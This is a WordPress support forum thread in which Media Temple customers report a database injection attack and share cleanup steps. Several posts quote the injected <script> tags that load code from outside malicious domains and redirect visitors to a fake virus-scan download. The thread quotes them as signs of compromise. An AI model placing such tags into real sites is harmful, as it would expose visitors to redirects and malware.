Media Temple oeaou hack
-
Hi,
I looked in one of my pages today and now all of a sudden all my pages and posts have <script src=”http://ue.oeaou.com/31″></script> when you view the page in the HTML.Was my site hacked or was this put in here by a plugin?
-
I got the same thing. What plugins do you use? Maybe we have some of the same ones.
I have the same problem on several sites. I have checked the plugins I use, but they are different on the installations.
Well, I had the same problem. MediaTemple is my hosting provider, and they help me out with this. This is a WordPress Redirect Exploit hack that put a line of code on your database table wp_posts and wp_cats_posts
The line that is put by the hack in your wp_posts and wp_cats_posts can be one of these or similar
<script src=”http://ae.awaue.com/7″></script>
<script src=”http://ue.oeaou.com/31″></script>
<script src=”http://ie.eracou.com/3″></script>
<script src=”http://ao.euuaw.com/9″></script>You must delete all of these lines
Symptoms
* Visitors viewing posts on your blog may be redirected to third-party sites.
* Visitors may also be redirected to qooglesearch.com, which has already been disabled.Clean-Up
Search in your database (specially in “wp_posts” and “wp_cats_posts” tables for strings like these and delete it.
Info take it from: http://wiki.mediatemple.net/w/WordPress_Redirect_Exploit
I don’t know if maybe some plugin is doing these. I have the following plugins, let me know if you have the same or wich one do you have:
Adminimize
Akismet
cforms
Cleanup WordPress
Google Analyticator
Google News Sitemap
Google XML Sitemaps
HeadSpace2
Insights
jQuery Lightbox For Native Galleries
MobilePress
Podcasting Plugin by TSG
Post Tabs
Really Simple CAPTCHA
Revision Control
SEO Friendly Images
WordPress.com Stats
WP-PageNavi
WP-UserOnline
WP Geo
ZD YouTube FLV PlayerAh thanks for the reply. My sites are also hosted on a mediatemple server. So I will try now their solution.
I’ve noticed the same problem on a few Media Template WordPress websites this morning. The fix above from Media Templates site ended up fixing it.
Same problem here today on MediaTemplae.
The <script src= is also inserted into media attachment descriptions, so make sure to clean those too.Is it strange that everyone that is having a problem is using MediaTemple? I just noticed the same thing today.
Here are the plugins I am using:
Akismet
All in One Favicon
Announcement and Vertical Scroll News
BM Custom Login
Constant Contact API
Kimili Flash Embed
Store LocatorIt looks like only Akismet is in common with you, Mediosia. I am trying to fix it on my database, but phpMyAdmin will not let me login. MediaTemple is working on it, but at this point, I’m thinking about switching hosting. I have lots of other WordPress sites and never had this problem with different hosts.
Count me in. Found it on mine too.
And I’m on media temple.<script src=”http://ue.oeaou.com/31″></script>
This redirects people to a “Virus Scan” and asks them to download the “fix”
WOW!
Now I just have a big fat “Error establishing a database connection” on my home page.I went through the cleanup process as mentioned by mediosia
I’m good to go for nowSeems to be a media temple issue, will sticky this for now.
http://codex.wordpress.org/FAQ_My_site_was_hacked has some info on what to do in the event of hacks, as well as referencing the above posts.
fixed here too by removing all mentions via sql, but what a nightmare, esp is you have a few databases & multiple installs.
On Mediatemple too. Called and they cleaned the DBs. As for plugs, the only ones I have in common with Mediosia are as follows:
Akismet
WP-Stats
WP-Pagenavi@iso50 damn, they didn’t clean my DBs, just sent me links on how to do it my self & more or less said it’s not their problem.
Same again
Also on WordPress hosted by MediaTemple
The only ones I have in common isAkismet
WP-StatsHopefully be able to clean up the database as per mediatemple suggestion…not the first time the MediaTemple blog has fallen over, whilst all the other hosting servers remain solid!
- The topic ‘Media Temple oeaou hack’ is closed to new replies.